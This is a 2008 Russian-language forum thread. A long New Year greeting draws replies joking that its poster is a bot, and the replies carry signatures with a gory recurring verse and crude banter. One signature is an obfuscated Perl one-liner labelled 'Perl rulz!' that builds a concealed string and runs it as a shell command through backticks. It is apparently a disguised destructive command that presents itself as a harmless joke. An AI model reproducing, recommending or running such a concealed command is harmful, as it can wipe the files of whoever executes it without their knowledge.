Добавлено: Вс Янв 13, 2008 2:17 am Заголовок сообщения: Поздравления с НОВЫМ ГОДОМ (по старому стилю)
И в этот праздничный переходный момент я хочу поздравить Вас от всей души с Наступающим Новым 2008 Годом и уже прошедшими Рождественскими праздниками!
Я Верю в то, что в прошедшем году Вы успели сделать множество важных, полезных и приносящих Вам удовольствие дел. Теперь в Новом 2008 Году у Вас будет еще больше шансов реализовывать свои мечты и строить свою реальность, потому что каждый Новый Год приносит нам все больше открытий, мудрости и возможностей!
В Новом 2008 году желаю Вам:
Во-первых, не совершать тех ошибок с которыми Вам пришлось столкнуться в прошедшем году. Пожалуйста будьте мудрыми чтобы не наступать на старые грабли снова!
Во-вторых, больше уделять внимания тому, что приносит Вам настоящее удовольствие и делает Вас счастливыми! Только так Вы сможете все больше и больше наслаждаться жизнью.
В-третьих, поменьше идти на компромисы с самим собой и со своими ощущениями правильности. Никто лучше Вас на самом деле не знает что для Вас является наилучшим. Слушайте себя!
В-четвертых, больше учиться и понимать, вместо того, чтобы больше работать. Больше двигаться в качество действий, а не в их количество!
В-пятых, больше себя любить и уважать, потому что только таким образом можно добиться настоящей любви и уважения от других людей!
В-шестых, быть уверенными в себе, в своих силах, в своих способностях, но при этом не забывать о том, что Вы лишь часть огромного существования! Оно всегда готово прийти к Вам на помощь, если Вы живете мудро и доверяете жизни
Ну и в-седьмых, конечно же побольше добрых людей и настоящих друзей на Вашем пути, чтобы Вам было веселее жить и было с кем искренне разделить свою радость и любовь!
ЕЩЕ РАЗ - С НОВЫМ 2008 ГОДОМ!!!
Добавлено: Вс Янв 13, 2008 2:29 am Заголовок сообщения:
Мне кажется бот. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Янв 13, 2008 2:31 am Заголовок сообщения:
это определенно бот ток хз где тут спам, единственная ссылка это на яндекс О=о _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Янв 13, 2008 2:33 am Заголовок сообщения:
Может это единственный в мире бот,созданный поднимать людям хорошее настроение,а не уничтожать его на корню? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Мишка
это снова я, по-твоему? _________________ Скажи, что я ее люблю... Без нее вся жизнь равна нулю, из-за нее вся жизнь равна нулю... (с) А.Васильев
У тоб? так багато стор?н, я просто не розум?ю... Я просто хочу спитати тебе, чому ти наст?льки красива!?... (с) Олег Собчук
Цитаты дня:
xxx
Я много зарабатываю
xxx
Я работаю ртом
xxx
Я певица
yyy
а с личной жизнью все в порядке?
zzz
угу, еще как! Полный порядок. Мы никогда не ссоримся, не надоедаем друг другу и вообще во всем абсолютное согласие и единение
Мне нет.Я аномалия? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
бабка?
ну я могла бы отжечь,только не хочу тратить свою энерегию на этот интеренет-пиздоболизм) _________________ Freedom's just another word for nothin' left to lose.
Ой,я извиняюсь,правда как-то неудобно вышло.Просто у нас это в классе стало как устойчивое выражение и не несёт в себе никакого оскорбления собеседнику.Вот я по привычке и написал.Извиняюсь,если обидно получилось. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Мишка
пфф...меня таким не обидишь,тем более в инете.так что ничего,можете забрать свои извинения назад,джентельмен xDD _________________ Freedom's just another word for nothin' left to lose.